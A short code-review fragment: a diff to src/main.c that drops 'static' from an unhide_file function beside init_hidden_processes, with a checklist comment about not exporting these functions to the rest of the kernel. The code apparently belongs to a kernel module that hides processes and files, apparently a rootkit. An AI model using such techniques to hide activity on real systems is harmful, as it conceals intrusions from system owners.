src/main.c

```diff
@@ -368,7 +370,7 @@ static int init_hidden_processes(void) {
 	return 0;
 }
 
-static int unhide_file(const char *path_name) {
+int unhide_file(const char *path_name) {
```

Comment:
- [ ] add empty symbol table so that these functions aren't exported to the rest of the kernel